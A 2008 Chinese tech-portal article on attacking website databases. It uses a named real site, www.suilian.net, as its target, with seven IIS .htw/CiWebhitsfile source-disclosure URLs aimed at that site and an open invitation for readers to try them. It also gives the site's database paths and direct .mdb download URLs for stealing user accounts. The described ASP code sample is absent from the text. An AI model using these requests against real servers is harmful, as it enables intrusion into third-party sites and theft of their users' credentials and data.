科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道浅谈对数据库的攻击

浅谈对数据库的攻击

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户留下利用的机会了。

作者:51cto 来源:51cto 2008年7月4日

关键字: 数据库安全

  • 评论
  • 分享微博
  • 分享邮件

  一般的web server都要使用数据库来存储信息,几乎所有的网站都要用数据库。这样就存在着两种可能,一种是使用小型数据库,如aceess,一般就储存在本地。另一种是使用大型数据库,如SQL server,Oracle这时候一般就放在另一台机器上,然后通过ODBC来访问它。 

  由于页面经常需要查询各种信息,修改用户信息等操作,实质上就是和数据库打交道了。这样就给非法用户留下利用的机会了。

  对本地数据库的攻击。

  对本地数据库的攻击一种方法就是下载数据库,然后呢,你就可以打开这个数据库得到内部的用户和帐号了,以及其它有用的信息。

  下面以“水莲会”为例:

  经过扫描,得知www.suilian.net使用的是虚拟主机,使用的是WIndows NT+IIS4.0.扫描器你可以使用twwwscan或者其它,其实功能都大同小异。

  在对IIS攻击时如果能够看到ASP源代码,那么成功的可能性就很大了。

  经过测试,发现此站点存在源代码暴露漏洞。。。

  大家可以试试:

  http://www.suilian.net/null.htw?CiWebhitsfile=/maillist.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/index.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/chat/DetNew.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/chat/detail.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/chat/topic4.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlefrm.asp%20&CiRestriction=none&CiHiliteType=full

  http://www.suilian.net/null.htw?CiWebhitsfile=/chat/titlenew.asp%20&CiRestriction=none&CiHiliteType=full

  看见了什么?

  当然源代码泄露的漏洞有很多种,这里就不一一列举,你可以去查漏洞手册。

  现在你就可以去查看ASP源代码了。

  如果你对ASP不熟悉,我简单介绍一下(其实佳佳也不熟悉)。

  ASP是嵌在之间。一般使用VBScript或者JavaScript书写代码。

  看这个例子使用VBScript书写的:

  这是一个典型的与数据库连接的代码。

  依次的步骤为:

  建立连接对象,

  设置数据库路径,

  打开数据库,

  设置记录对象,

  取记录。

  这里我们就可以知道数据库的类型,名称和路径,这里是在当前目录下。

  还可以知道数据库的表名和字段名称。

  有经验的程序员一般不会把数据库名直接放在代码里,而是在ODBC里设置数据源,以增加安全性。

  然后就发现存在

  d:\S\suilian\chat\news.mdb

  d:\S\suilian\topic22.mdb等数据库

  你只要使用

  http://www.suilian.net/chat/news.mdb

  http://www.suilian.net/topic22.mdb

  就可以把它下载下来。。。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章